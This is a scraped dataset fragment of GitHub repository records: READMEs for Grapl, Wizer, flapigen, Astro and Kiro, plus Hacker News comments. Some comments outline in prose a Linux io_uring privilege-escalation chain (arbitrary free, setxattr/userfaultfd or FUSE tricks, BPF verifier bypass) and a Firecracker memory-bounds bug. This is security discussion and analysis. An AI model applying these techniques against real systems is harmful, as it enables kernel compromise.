logs, meaning that your data storage grows sublinear to the\nlog volume.\n\nThis cuts down on storage costs and gives you central locations to\nview your data, as opposed to having it spread across thousands of\nlogs. As an example, given a process\u2019s canonical identifier you can\nview all of the information for it by selecting the node.\n\n![](https://d2mxuefqeaa7sj.cloudfront.net/s_7CBC3A8B36A73886DC59F4792258C821D6717C3DB02DA354DE68418C9DCF5C29_1553026555668_image.png)\n\n\n**Analyzers**\nhttps://grapl.readthedocs.io/en/latest/analyzers/implementing.html\n\nAnalyzers are your attacker signatures. They\u2019re Python modules,\ndeployed to Grapl\u2019s S3 bucket, that are orchestrated to execute upon\nchanges to grapl\u2019s Master Graph.\n\nRather than analyzers attempting to determine a binary \"Good\" or \"Bad\"\nvalue for attack behaviors Grapl leverages a concept of Risk, and then\nautomatically correlates risks to surface the riskiest parts of your\nenvironment.\n\nAnalyzers execute in realtime as the master graph is updated, using\nconstant time operations. 
Grapl's Analyzer harness will automatically\nbatch, parallelize, and optimize your queries. By leveraging constant\ntime and sublinear operations Grapl ensures that as your organization\ngrows, and as your data volume grows with it, you can still rely on\nyour queries executing efficiently.\n\nGrapl provides an analyzer library so that you can write attacker\nsignatures using pure Python. See this [repo for\nexamples](https://github.com/grapl-security/grapl-analyzers).\n\nHere is a brief example of how to detect a suspicious execution of `svchost.exe`,\n```python\nclass SuspiciousSvchost(Analyzer):\n\n def get_queries(self) -> OneOrMany[ProcessQuery]:\n invalid_parents = [\n Not(\"services.exe\"),\n Not(\"smss.exe\"),\n Not(\"ngentask.exe\"),\n Not(\"userinit.exe\"),\n Not(\"GoogleUpdate.exe\"),\n Not(\"conhost.exe\"),\n Not(\"MpCmdRun.exe\"),\n ]\n\n return (\n ProcessQuery()\n .with_process_name(eq=invalid_parents)\n .with_children(\n ProcessQuery().with_process_name(eq=\"svchost.exe\")\n )\n )\n\n def on_response(self, response: ProcessView, output: Any):\n output.send(\n ExecutionHit(\n analyzer_name=\"Suspicious svchost\",\n node_view=response,\n risk_score=75,\n )\n )\n```\nKeeping your analyzers in code means you can:\n\n- Code review your alerts\n- Write tests, integrate into CI\n- Build abstractions, reuse logic, and generally follow best practices\n for maintaining software\n\nCheck out Grapl's [analyzer deployer\nplugin](https://github.com/grapl-security/grapl-analyzer-deployer) to see\nhow you can keep your analyzers in a git repo that automatically\ndeploys them upon a push to master.\n\n**Engagements**\n\nGrapl provides a tool for investigations called an\nEngagement. Engagements are an isolated graph representing a subgraph\nthat your analyzers have deemed suspicious.\n\nUsing AWS Sagemaker hosted Jupyter Notebooks and Grapl's provided\nPython library you can expand out any suspicious subgraph to encompass\nthe full scope of an attack. As you expand the attack scope with your\nJupyter notebook the Engagement Graph will update, visually\nrepresenting the attack scope.\n\n![](https://s3.amazonaws.com/media-p.slid.es/uploads/650602/images/6646682/Screenshot_from_2019-10-11_20-24-34.png)\n\n**Event Driven and Extendable**\n\nGrapl was built to be extended - no service can satisfy every\norganization\u2019s needs. Every native Grapl service works by sending and\nreceiving events, which means that in order to extend Grapl you only\nneed to start subscribing to messages.\n\nThis makes Grapl trivial to extend or integrate into your existing services.\n\nGrapl also provides a Plugin system, currently in beta, that allows\nyou to expand the platforms capabilities - adding custom nodes and\nquerying capabilities.\n\n\n## Setup\nhttps://grapl.readthedocs.io/en/main/setup/\n", "readme_type": "markdown", "hn_comments": "tl;dr: The article describes the details of Firecrackers architecture and CVE-2019-18960, which (as you can imagine) got fixed long ago.> Firecracker is comparable to QEMU; they are both VMMs that utilize KVM, a hypervisor built into the Linux kernel.That's not accurate: While KVM is mandatory for Firecracker, it isn't for QEMU.The fact that this doesn't seem exploitable shows the value of defense in depth: although numerous safety measures were defeated, exploitation was ultimately blocked by a guard page. If that guard page hadn't been there, the outcome could have been very bad. 
Still, it got closer to exploitable than anyone is comfortable with.A lot of people have proposed using Rust for OS development. There are even plans to write Linux kernel modules in Rust.I think this article is a very good demonstration of why Rust is not a silver bullet. It was created with userspace applications in mind and a system application is an entirely different beats.Think about it this way: in C it is easy to shoot yourself in the foot. But in kernel space you can easily blow up the entire building.> Currently, io_uring system calls are included in Firecracker\u2019s seccomp filter. Because it redefines how system calls are executed, io_uring offers a seccomp bypass for the supported system calls. This is because seccomp filtering occurs on system call entry after a thread context switch, but system calls executed via io_uring do not go through the normal system call entry. Therefore, Firecracker\u2019s seccomp policy should be treated as its union with all system calls supported by io_uring....> Because of the nature of system call filtering via seccomp, io_uring still presents a major security disruption in sandboxing.This is pretty interesting as io_uring has been seen a lot of press as the hot new thing.This is a pretty good writeup of a long-fixed Firecracker bug (CVE-2019-18960).Firecracker is a KVM hypervisor, and so a Firecracker VM is a Linux process (running Firecracker). The guest OS sees \"physical memory\", but that memory is, of course, just mapped pages in the Firecracker process (the \"host\").Modern KVM guests talk to their hosts with virtio, which is a common abstraction for a bunch of different device types that consists of queues of shared buffers. Virtio queues are used for network devices, block devices, and, apropos this bug, for vsocks, which are a sort of generic host-guest socket interface (vsock : host/guest :: netlink : user/kernel, except that Netlink is much better specified, and people just do sort of random stuff with vsocks. They're handy.)The basic deal with managing virtio vsock messages is that the guest is going to fill in and queue buffers on its side expecting the host to read from them, which means that when the host receives them, it needs to dereference pointers into guest memory. Which is not that big of a deal; this is, like, some of the basic functioning of a hypervisor. A running guest has a \"regions\" of physical memory that correspond to mapped pages in Firecracker on the host side; Firecracker just needs to keep tables of regions and their corresponding (host userland) memory ranges.This table is usually pretty simple; it's 1 entry long if the VM has less than 3.5G, and 2 entries if more. Unless you're on ARM, in which case it's always 1 entry, and the bug wasn't exploitable.The only tricky problem here for Firecracker is that we can't trust the guest --- that's the premise of a hypervisor! --- and a guest can try to create fucky messages with pointers into invalid memory, hoping that they'll correspond to invalid memory ranges in the host that Firecracker will deference. And, indeed, in 2019, there was a case where that would happen: if you sent a vsock message, which is a tuple (header, base, size), where:1. The guest had more than 3.5G of memory, so that Firecracker would have more than one region table entry2. The base address landed in some valid entry in the table of regions3. 
base+size lands in some other valid entry in the table of regionsThere are two bugs: first, a validity check on virtio buffers doesn't check to make sure that both base and base+size are in the same, valid region, and second, code that extracts the virtio vsock message does an address check on the buffer address with a size of 1 (in other words, just checking to see if the base address is valid, without respect to the size).At any rate, because the memory handling code here deals with raw pointers, this was done in Rust `unsafe{}` blocks, and so this bug combination would theoretically let a guest trick Firecracker into writing into host memory outside of a valid guest memory range.The hitch, which is as far as I know fatal: there's nothing mapped in between regions in x86 Firecracker that you can write to: between a memory region and the no-mans-land memory region outside it, there always happen to be PROT_NONE guard pages\u2020, so an overwrite will simply kill the Firecracker process. Since the attacker here already controls the guest kernel, crashing the guest this way doesn't win you anything you didn't already have.\u2020 And now, post-fix, there's deliberately PROT_NONE guard pages around regionsI was expecting a demo of an exploit, but what I got was code analysis and verbal handwaving. Anyone else feel like something was missing here?Edit, I did learn cool new stuff tho, thanks.Long story short: unsafe code can still be a source of vulnerabilities, even in a memory and thread-safe language. To me this sounds glaringly obvious.Every GraphQL framework comes with ZERO security guardrails out of the box!\nYou'd be surprised how vulnerable most GraphQL APIs are (even at big cos )So at Escape, we decided to ship a quick scan to check for the basic requirements: a dozen security best practices.It's completely free of charge and you don't to create an account.Let us know if you have any questions or feedback!Cool. Can this be used for local endpoints (localhost) as well?Seems like a neat service. It doesn't scan endpoints that block unauthorized access (which makes sense) and points at the free trial of the more full-fledged offering. The only issue I have is that I'm very reluctant to sign up for a free trial with no idea of what pricing will look like.tl;dr Facebook didn't think their tech through. Who knew! It's almost like they want to move fast and break things. Steer clear from GraphQL and use battle tested systems no trendy hipster shit just because.This is one of the all-time great LPE writeups.A summary:1. io_uring includes a feature that asks the kernel to manage groups of buffers for SQEs (the objects userland submits to tell uring what to do). If you enable this feature, the kernel overloads a field normally used to track a userland pointer with a kernel pointer.2. The special-case code that handles I/O operations for files-that-are-not-files, like in procfs, missed the check for this \"overloaded pointer\" hack, and so can be tricked into advancing a kernel pointer arbitrarily, because it thinks it's working with a userland pointer.3. The pointer you manipulate thusly is eventually freed, which lets you free kernel objects within a range of possible pointers.4. 
io_uring allows you to control the CPU affinity of the kernel threads it generates on your behalf, because of course it does, so you can get your userland process and all your related io_uring kthreads onto the same CPU, and thus into the same SLUB cache area, which gives you enough control to target specific kernel objects (of a size bounded I think by the SQE?) reliably.5. There's a well-known LPE trick for exploiting UAFs: the setxattr(2) syscall copies arbitrary extended attributes for files from userland to kernel buffers (that's its job), and the userfaultfd(2) syscall lets you defer page faults to userland; you can chain setxattr and userfaultfd to allocate and populate a kernel buffer of arbitrary size and contents and then block, keeping the object in memory.6. Since that's a popular exploit technique, there's a default-yes setting in most distros to require root to use userfaultfd(2) --- but you can do the same thing with FUSE, where deferring I/O operations to userland is kind of the whole premise of the interface.7. setxattr/userfaultfd can be transformed from a UAF primitive to an arbitrary kernel leak: if you have an arbitrary-free vulnerability (see step 3), you can do the setxattr-then-block thing, then trigger the free from another thread and target the xattr buffer, so setxattr's buffer is reclaimed out from under it, then trigger the allocation of a kernel structure you want to leak that is of the same size, which setxattr will copy into (another UAF); now you have a kernel structure that the kernel is treating like a file's extended attributes, which you can read back with getxattr. Neat!8. At this point you can go hunting for kernel structures to whack, because you can use the arbitrary leak primitive to leak structs that in turn embed the (secret) addresses of other kernel structures.9. Find a pointer to a socket's BPF filter and use the UAF to inject a BPF filter directly, bypassing the verifier, then trigger the BPF filter and do whatever you want, I guess.I'm sure I got a bunch of this wrong; corrections welcome. Again: really spectacular writeup: a good bug, some neat tricks, and a decent survey of Linux kernel LPE techniques.> most distros sync on stable releases[citation needed]Yes, unfortunately I figured this \nmight happen. People have been warning of some major issues with its design for a while now wrt security. Paired with the fact it's not much faster in practice than epoll in a large majority of usecases, I really worry it's going to footgun some people.Whoa!One frickin\u2019 GIANT driver coherency setting, I/O Ring, that is.How does one go from \"complete security guide\" to \"fix these 13 most common vulns to go to prod\"?Leaves me skeptical, especially since they don't talk about good design or dealing with authorization through the resolving process.It is hard not to interpret the recommendation at the end of this article \u2013 which is to wrap your GraphQL API in a locked down JSON-RPC API - as an argument for not using GraphQL at all.I implemented some of the measures mentioned here - such as execution limits - in my datasette-graphql plugin: https://datasette.io/plugins/datasette-graphql#user-content-...> If we search the same source for the birth of GraphQL, we can see, it's Sep 2014, around 7 years old.GraphQL is a little older than that. It was initially developed at Facebook in 2012. 
It says as much on the graphQL website right on the main page: https://graphql.orgI was surprised there was no mention of whitelisting.If I know the queries that client apps are going to be running it would be useful to lock the API down to those. It sacrifices flexibility, but if you control apps and server, e.g. a startup then you still get the benefit of flexibility in development. Just need a system of add to the whitelist before deployment.I have been looking for a way to achieve this with graphene but looks like there isn't a library for that yet. I'm wonder if other platforms offer this?What is meant by operation validation here? (I'm not familiar with graphql)edit: according to most explanations it's about catching accesses to nonexistent fields, cycles, and other things you'd like a nice error message from - would be interesting to hear some security relevant cases.I think the article does a disservice to itself by casually adding in things like \"SQL injection\" and a few other issues that are really not unique to GraphQL. A more concise article that only touches on the issues that are GraphQL specific would be welcome.Beyond that, I find the authorization sections unconvincing. As someone who's spent quite a bit of time thinking about authorization in GraphQL APIs, I think that the only viable option for authorization in GraphQL is node level authorization, especially if using the relay convention. You're forced to write every authorization check as a function of the relationship between the user and the subject at hand and it avoids accidentally leaking information (which is also issue with REST APIs that do authorization at the controller level, \u00e0 la https://news.ycombinator.com/item?id=25728175).I was hoping that at the end of each section, there would be the actionable items to do / fix, but it seems they're all sort of handled at the end of the article, which was a bit jarring.OK, this entire article was just completely bizarre IMO:1. A bunch of the points at the top had to do with writing your own GraphQL parser. I don't disagree this is a complicated task, or that some libraries have implementation bugs, but GraphQL has certainly been around long enough that there are some hugely popular, battle-tested server implementations available. I'm not arguing those implementations are 100% bug-free, but they certainly have tons of eyes on them and are in widespread active development.2. Many of the bugs have nothing to do with GraphQL. SQL injection or URL path injection are possible everywhere (hint, use a library like slonik that makes it easy to write SQL that looks like string concatenation but actually makes it virtually impossible to have a SQL injection bug).3. Many of the other bugs are either standard IDOR-type bugs, again possible in any framework, or that arise from a potentially recursive type definition. Yes, if you have different permissions applied at different levels of a recursive hierarchy, you need to be very careful about how those permissions are applied.4. In contrast to this article, I find GraphQL to be a dream from a security perspective precisely because it is strongly typed. E.g. I define many custom scalar types that I use for inputs that guarantee that by the time I see a value that it is already validated so it can't cause an injection attack. For example, suppose you know all your identifiers are alphanumeric. 
Just define an AlphaNumericString custom scalar type and you know then that many types of injection attacks would be impossible.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bytecodealliance/wizer", "link": "https://github.com/bytecodealliance/wizer", "tags": [], "stars": 675, "description": "The WebAssembly Pre-Initializer", "lang": "Rust", "repo_lang": "", "readme": "
\n

Wizer

\n\n

\n The WebAssembly Pre-Initializer!\n

\n\n A Bytecode Alliance project\n\n

\n \"build\n \"zulip\n \"Documentation\n

\n\n

\n API Docs\n | \n Contributing\n | \n Chat\n

\n
\n\n* [About](#about)\n* [Install](#install)\n* [Example Usage](#example-usage)\n* [Caveats](#caveats)\n* [Using Wizer as a Library](#using-wizer-as-a-library)\n* [How Does it Work?](#how-does-it-work)\n\n## About\n\nDon't wait for your Wasm module to initialize itself, pre-initialize it! Wizer\ninstantiates your WebAssembly module, executes its initialization function, and\nthen snapshots the initialized state out into a new WebAssembly module. Now you\ncan use this new, pre-initialized WebAssembly module to hit the ground running,\nwithout making your users wait for that first-time set-up code to complete.\n\nThe improvements to start-up latency you can expect will depend on how much\ninitialization work your WebAssembly module needs to do before it's ready. Some\ninitial benchmarking shows between 1.35 and 6.00 times faster instantiation and\ninitialization with Wizer, depending on the workload:\n\n| Program | Without Wizer | With Wizer | Speedup |\n|------------------------|--------------:|-----------:|-----------------:|\n| [`regex`][regex-bench] | 248.85 us | 183.99 us | **1.35x faster** |\n| [UAP][uap-bench] | 98.297 ms | 16.385 ms | **6.00x faster** |\n\n[regex-bench]: https://github.com/bytecodealliance/wizer/tree/main/benches/regex-bench\n[uap-bench]: https://github.com/bytecodealliance/wizer/tree/main/benches/uap-bench\n\nNot every program will see an improvement to instantiation and start-up\nlatency. For example, Wizer will often increase the size of the Wasm module's\n`Data` section, which could negatively impact network transfer times on the\nWeb. However, the best way to find out if your Wasm module will see an\nimprovement is to try it out! Adding an initialization function isn't too hard.\n\nFinally, you can likely see further improvements by running\n[`wasm-opt`][binaryen] on the pre-initialized module. Beyond the usual benefits\nthat `wasm-opt` brings, the module likely has a bunch of initialization-only\ncode that is no longer needed now that the module is already initialized, and\nwhich `wasm-opt` can remove.\n\n[binaryen]: https://github.com/WebAssembly/binaryen\n\n## Install\n\nDownload a pre-built release from the [releases](https://github.com/bytecodealliance/wizer/releases) page. Unarchive the binary and place it in your $PATH.\n\nAlternatively you can install via `cargo`:\n\n```shell-session\n$ cargo install wizer --all-features\n```\n\n## Example Usage\n\nFirst, make sure your Wasm module exports an initialization function named\n`wizer.initialize`. For example, in Rust you can export it like this:\n\n```rust\n#[export_name = \"wizer.initialize\"]\npub extern \"C\" fn init() {\n    // Your initialization code goes here...\n}\n```\n\nFor a complete C++ example, see [this](https://github.com/bytecodealliance/wizer/tree/main/examples/cpp).\n\nThen, if your Wasm module is named `input.wasm`, run the `wizer` CLI:\n\n```shell-session\n$ wizer input.wasm -o initialized.wasm\n```\n\nNow you have a pre-initialized version of your Wasm module at\n`initialized.wasm`!\n\nMore details, flags, and options can be found via `--help`:\n\n```shell-session\n$ wizer --help\n```\n
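\n\nAs a concrete illustration of the kind of set-up work worth moving into `wizer.initialize` (a hypothetical example, not part of Wizer itself), an initializer might precompute a lookup table that would otherwise be rebuilt on every start-up:\n```rust\nuse std::sync::OnceLock;\n\n// Hypothetical example: a table that is expensive to build at run time.\nstatic TABLE: OnceLock<Vec<u32>> = OnceLock::new();\n\nfn crc32_table() -> Vec<u32> {\n    (0..256u32)\n        .map(|i| {\n            let mut c = i;\n            for _ in 0..8 {\n                c = if c & 1 != 0 { 0xEDB8_8320 ^ (c >> 1) } else { c >> 1 };\n            }\n            c\n        })\n        .collect()\n}\n\n#[export_name = \"wizer.initialize\"]\npub extern \"C\" fn init() {\n    // Build the table once here; Wizer snapshots the initialized state, so the\n    // pre-initialized module ships with TABLE already populated.\n    TABLE.get_or_init(crc32_table);\n}\n```\n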
\n## Caveats\n\n* The initialization function may not call any imported functions. Doing so will\n trigger a trap and `wizer` will exit. You can, however, allow WASI calls via\n the `--allow-wasi` flag.\n\n* The Wasm module may not import globals, tables, or memories.\n\n* Reference types are not supported yet. It isn't 100% clear yet what the best\n approach to snapshotting `externref` tables is.\n\n## Using Wizer as a Library\n\nAdd a dependency in your `Cargo.toml`:\n\n```toml\n# Cargo.toml\n\n[dependencies]\nwizer = \"1\"\n```\n\nAnd then use the `wizer::Wizer` builder to configure and run Wizer:\n\n```rust\nuse wizer::Wizer;\n\nlet input_wasm = get_input_wasm_bytes();\n\nlet initialized_wasm_bytes = Wizer::new()\n    .allow_wasi(true)?\n    .run(&input_wasm)?;\n```\n\n## Using Wizer with a custom Linker\n\nIf you want your module to be able to import other modules during instantiation, you can\nuse the `.make_linker(...)` builder method to provide your own Linker, for example:\n\n```rust\nuse wizer::Wizer;\n\nlet input_wasm = get_input_wasm_bytes();\nlet initialized_wasm_bytes = Wizer::new()\n    .make_linker(Some(Rc::new(|e: &wasmtime::Engine| {\n        let mut linker = wasmtime::Linker::new(e);\n        linker.func_wrap(\"foo\", \"bar\", |x: i32| x + 1)?;\n        Ok(linker)\n    })))\n    .run(&input_wasm)?;\n```\n\nNote that `allow_wasi(true)` and a custom linker are currently mutually exclusive.\n\n## How Does it Work?\n\nFirst we instantiate the input Wasm module with Wasmtime and run the\ninitialization function. Then we record the Wasm instance's state:\n\n* What are the values of its globals?\n* What regions of memory are non-zero?\n\nThen we rewrite the Wasm binary by initializing its globals directly to their\nrecorded state, and removing the module's old data segments and replacing them\nwith data segments for each of the non-zero regions of memory we recorded.\n\nWant some more details? Check out the talk [\"Hit the Ground Running: Wasm\nSnapshots for Fast Start\nUp\"](https://fitzgeraldnick.com/2021/05/10/wasm-summit-2021.html) from the 2021\nWebAssembly Summit.\n
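\nAs a rough sketch of that last step (a hypothetical helper for illustration, not Wizer's actual code), collecting the non-zero regions of a memory snapshot might look like this:\n```rust\n/// Collect (offset, bytes) pairs for the non-zero regions of a memory\n/// snapshot, merging regions separated by fewer than `min_gap` zero bytes.\n/// Hypothetical helper; Wizer's real segment logic is more sophisticated.\nfn non_zero_regions(memory: &[u8], min_gap: usize) -> Vec<(usize, Vec<u8>)> {\n    let mut regions = Vec::new();\n    let mut i = 0;\n    while i < memory.len() {\n        if memory[i] == 0 {\n            i += 1;\n            continue;\n        }\n        let start = i;\n        let mut end = i + 1;\n        let mut zeros = 0;\n        while end < memory.len() && zeros < min_gap {\n            if memory[end] == 0 { zeros += 1 } else { zeros = 0 }\n            end += 1;\n        }\n        end -= zeros; // trim the trailing run of zeros\n        regions.push((start, memory[start..end].to_vec()));\n        i = end;\n    }\n    regions\n}\n```\nEach returned region would then become one data segment at its offset in the rewritten module.\n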
", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Dushistov/flapigen-rs", "link": "https://github.com/Dushistov/flapigen-rs", "tags": ["java", "jni", "rust", "swig", "wrapper", "codegen", "c", "cpp"], "stars": 674, "description": "Tool for connecting programs or libraries written in Rust with other languages", "lang": "Rust", "repo_lang": "", "readme": "# flapigen [![Build Status](https://github.com/Dushistov/flapigen-rs/workflows/CI/badge.svg)](https://github.com/Dushistov/flapigen-rs/actions?query=workflow%3ACI+branch%3Amaster) [![License](https://img.shields.io/badge/license-BSD-green.svg)](https://github.com/Dushistov/flapigen-rs/blob/master/LICENSE) [![Rust Documentation](https://img.shields.io/badge/api-rustdoc-blue.svg)](https://docs.rs/flapigen)\n\nTool for connecting programs or libraries written in Rust with other languages.\nForeign language API generator - flapigen. The former name, rust_swig, was changed to avoid confusion\nwith [swig](https://github.com/swig/swig).\nSupport is currently implemented for `C++` and `Java`, but you can write support\nfor any language of your choice. For instructions on how to integrate flapigen with your\nproject, look [here](https://dushistov.github.io/flapigen-rs/getting-started.html).\n\nSuppose you have the following Rust code:\n\n```rust\nstruct Foo {\n    data: i32\n}\n\nimpl Foo {\n    fn new(val: i32) -> Foo {\n        Foo { data: val }\n    }\n\n    fn f(&self, a: i32, b: i32) -> i32 {\n        self.data + a + b\n    }\n\n    fn set_field(&mut self, v: i32) {\n        self.data = v;\n    }\n}\n\nfn f2(a: i32) -> i32 {\n    a * 2\n}\n```\n\nand you want to write in Java something like this:\n\n```Java\nFoo foo = new Foo(5);\nint res = foo.f(1, 2);\nassert res == 8;\n```\nor in C++ something like this:\n\n```C++\nFoo foo(5);\nint res = foo.f(1, 2);\nassert(res == 8);\n```\n\nTo implement this, flapigen provides the following functionality; in your Rust project you write (in Rust):\n\n```rust\nforeign_class!(class Foo {\n    self_type Foo;\n    constructor Foo::new(_: i32) -> Foo;\n    fn Foo::set_field(&mut self, _: i32);\n    fn Foo::f(&self, _: i32, _: i32) -> i32;\n    fn f2(_: i32) -> i32;\n});\n```\n\nand that's all: flapigen generates JNI wrappers for the Rust functions\nand Java code to call these JNI functions,\nor, in the C++ case, C-compatible wrappers and\nC++ code to call these C functions.\n\nIf you want the interface file (the file containing `foreign_class!` and so on)\nto be automatically generated for you, check out [rifgen](https://crates.io/crates/rifgen).\n\n## Users Guide\n\n[\ud83d\udcda Read the `flapigen` users guide here! \ud83d\udcda](https://dushistov.github.io/flapigen-rs/)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "astrolang/astro", "link": "https://github.com/astrolang/astro", "tags": ["astro", "programming-language", "wasm", "webassembly", "javascript", "language-features", "python", "numerical-computation"], "stars": 674, "description": "A fun safe language for rapid prototyping and high performance applications", "lang": "Rust", "repo_lang": "", "readme": "\n
\n \n \"Astro\n \n
\n\n

The Astro Programming Language

\n\n#### Work in Progress :construction:\nCurrent Version: 0.1.15a\n\n![astro screenshot](https://github.com/astrolang/astro/blob/develop/media/syntax_screenshot.png)\n\n### What is Astro?\nAstro is a fun programming language designed for safe _high-performance applications_. It is essentially a statically-typed systems language that\n- facilitates rapid prototyping,\n- features high-level abstractions with zero overhead,\n- ensures memory safety without a (tracing) Garbage Collector, and\n- supports data-race-free concurrency.\n\n### Why create yet another programming language?\nThe language creator had a set of requirements (listed above) not met by any language ([Rust](https://en.wikipedia.org/wiki/Rust_programming_language) comes close). Although the project started as an educational effort, it later took shape as a language designed to meet those requirements.\n\nSIMD, threads and direct access to Web APIs are planned for WebAssembly. These and other proposals for GPU Compute will make the web a desirable HPC target in the near future. Astro is, for this reason, designed for high-performance apps that are expected to run on the server or in the browser.\n\nIn order to match the expressiveness and productivity of dynamic programming languages, Astro adds full type inference, structural typing, and some other high-level abstractions that reduce the boilerplate code commonly associated with statically-typed languages. It feels like a scripting language for the most part.\n\n#### Python\n```python\ndef times(a, b):\n    sum = a\n    for i in range(b):\n        sum += sum\n    return sum\n```\n#### Astro\n```kotlin\nfun times(a, b) {\n    var sum = a\n    for i in range(b) {\n        sum += sum\n    }\n    return sum\n}\n```\n\nAstro is supposed to be high-level enough to write Python-like scripts but also low-level enough to write an operating system kernel. Therefore, it doesn't have a traditional [garbage collector](https://en.m.wikipedia.org/wiki/Garbage_collection_(computer_science)); instead it relies on compile-time lifetime analysis that frees memory once it is no longer referenced.\n\n### How close is Astro to being ready for use?\nNot close. Astro is in its infancy; there are several tasks to complete before it becomes usable.\n\nFor now, Astro can compile its source code to AST format. It is not ready for even the simplest application. It is currently implemented in Rust (it was previously being implemented in JavaScript and C++); the plan is to bootstrap the compiler (implement it in Astro) once it is sufficiently well-featured.\n\n### Where can I read about the language?\nThere is no thorough documentation for the language yet since the main implementation is still in active development; however, you can find an up-to-date summary of language features [here](doc/summary.astro).\n\n### How do I install it?\nN/A\n\n### Want to contribute to the project?\nPlease read the [code of conduct](CODE_OF_CONDUCT.md) and contribution [guidelines](CONTRIBUTING.md). We welcome your ideas and contributions.\n\n### Do you have an unanswered question?\nPlease [open an issue](https://github.com/appcypher/astro/issues/new) and ask questions, offer to help, point out bugs or suggest features.\n\n### Attributions\nAstro logo made by [Freepik](https://www.freepik.com/)\n\n### License\n[Apache 2.0](LICENSE)\n", "readme_type": "markdown", "hn_comments": "Hey HN!
I am launching a new product today that adds a bunch of features to your SaaS products to speed up your growth.\n\nAdd Astrola to your subdomain and gain instant access to the following:\n\nKnowledge Base: Document in multiple languages. \n Feedback: Gather feedback, vote and comment. \n Roadmaps: Plan your upcoming features. \n Changelogs: Share what's new with your product. \n Blogging: Organic growth with SEO ready blogs. \n Newsletters: Send subscribers your latest posts. \n Customize: Match your brand with design options.\n\nI've been working on this project nights and weekends for about a year. It's been a fun mix of a lot of things -- hardware, software, CAD, web apps, device drivers.\n\nIt's still rather primitive, but it's reached a point where I believe it could be useful to other astronomers.\n\nI'd appreciate feedback from anyone about the web site, video walkthrough, and product. If you are into astronomy or astrophotography, I'd especially appreciate any feedback you have about the product itself, and what you'd find useful.\n\nThanks in advance for checking it out.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rhysd/kiro-editor", "link": "https://github.com/rhysd/kiro-editor", "tags": ["terminal", "text-editor", "utf-8", "rust"], "stars": 674, "description": "A terminal UTF-8 text editor written in Rust \ud83d\udcdd\ud83e\udd80", "lang": "Rust", "repo_lang": "", "readme": "Kiro\n====\n[![crates.io][crates-io-badge]][crates-io]\n[![Build Status][build-badge]][ci]\n\n[Kiro][] is a tiny UTF-8 text editor for the terminal, written in Rust. Kiro was started as a Rust port of\nthe awesome minimal text editor [kilo][] and has grown with various extensions & improvements.\n\n(screenshot: main screenshot)\n\nIt provides basic features as a minimal text editor:\n\n- Open/Save text files\n- Create new text files and empty text buffers in memory\n- Edit a text (put/delete characters, insert/delete lines, ...)\n- Simple syntax highlighting\n- Simple incremental text search\n\nAnd Kiro extends [kilo][] to improve editing (please see the 'Extended Features' and 'Implementation'\nsections below for more details):\n\n- Support editing UTF-8 characters like '\ud83d\udc36' (kilo only supports ASCII characters)\n- Undo/Redo\n- More useful shortcuts (Alt modifier is supported)\n- 24-bit colors (true colors) and 256 colors support using the [gruvbox][] retro color palette with a 16\n colors fallback\n- More efficient screen rendering and highlighting (kilo renders the entire screen each time)\n- Open multiple files (switch buffers by Ctrl-X/Alt-X)\n- Resizing the terminal window is supported; the screen size is responsive\n- Highlight more languages (Rust, Go, JavaScript, C++) and items (statements, types, number literals, ...)\n- Automatically closes the message bar at the bottom of the screen\n- Modular implementation for each concern, such as parsing key inputs, rendering the screen, calculating\n highlights, and modifying the text buffer (kilo implements everything in one `kilo.c` with several global\n variables)\n- Incremental text search is fixed and improved (kilo only highlights the current match and only hits\n once per line).\n\n[Kiro][] aims to support various kinds of xterm terminals on Unix-like systems.
For example Terminal.app,\niTerm2.app, Gnome-Terminal, (hopefully) Windows Terminal on WSL.\n\nI learned various things by making this project following ['Build Your Own Text Editor' guide][byote].\nPlease read 'Implementation' section below to find some interesting topics.\n\n\n\n## Installation\n\nPlease install [`kiro-editor`][crates-io] package by building from sources using [cargo][].\n\n```\n$ cargo install kiro-editor\n```\n\nNote: Please use a Rust stable toolchain as new as possible.\n\nFor NetBSD, `kiro-editor` package is available.\n\nhttps://pkgsrc.se/editors/kiro-editor\n\n\n\n## Usage\n\n### CLI\n\nInstalling [`kiro-editor`][crates-io] package introduces `kiro` command in your system.\n\n```sh\n$ kiro # Start with an empty text buffer\n$ kiro file1 file2... # Open files to edit\n```\n\nPlease see `kiro --help` for command usage.\n\n\n### Edit Text\n\nKiro is a mode-less text editor. Like other famous mode-less text editors such as Nano, Emacs,\nGedit or NotePad.exe, you can edit text in terminal window using a keyboard.\n\nAnd several keys with Ctrl or Alt modifiers are mapped to various features. You don't need to\nremember all mappings. Please type `Ctrl-?` to know all mappings in editor.\n\n- **Operations**\n\n| Mapping | Description |\n|----------|-------------------------------------------------------------------------------------|\n| `Ctrl-?` | Show all key mappings in editor screen. |\n| `Ctrl-Q` | Quit Kiro. If current text is not saved yet, you need to input `Ctrl-Q` twice. |\n| `Ctrl-S` | Save current buffer to file. Prompt shows up to enter file name for unnamed buffer. |\n| `Ctrl-G` | Incremental text search. |\n| `Ctrl-O` | Open file or empty buffer. |\n| `Ctrl-X` | Switch to next buffer. |\n| `Alt-X` | Switch to previous buffer. |\n| `Ctrl-L` | Refresh screen. |\n\n- **Moving cursor**\n\n| Mapping | Description |\n|-------------------------------------|------------------------------------|\n| `Ctrl-P` or `\u2191` | Move cursor up. |\n| `Ctrl-N` or `\u2193` | Move cursor down. |\n| `Ctrl-F` or `\u2192` | Move cursor right. |\n| `Ctrl-B` or `\u2190` | Move cursor left. |\n| `Ctrl-A` or `Alt-\u2190` or `HOME` | Move cursor to head of line. |\n| `Ctrl-E` or `Alt-\u2192` or `END` | Move cursor to end of line. |\n| `Ctrl-[` or `Ctrl-V` or `PAGE DOWN` | Next page. |\n| `Ctrl-]` or `Alt-V` or `PAGE UP` | Previous page. |\n| `Alt-F` or `Ctrl-\u2192` | Move cursor to next word. |\n| `Alt-B` or `Ctrl-\u2190` | Move cursor to previous word. |\n| `Alt-N` or `Ctrl-\u2193` | Move cursor to next paragraph. |\n| `Alt-P` or `Ctrl-\u2191` | Move cursor to previous paragraph. |\n| `Alt-<` | Move cursor to top of file. |\n| `Alt->` | Move cursor to bottom of file. |\n\n- **Edit text**\n\n| Mapping | Description |\n|-------------------------|---------------------------|\n| `Ctrl-H` or `BACKSPACE` | Delete character |\n| `Ctrl-D` or `DELETE` | Delete next character |\n| 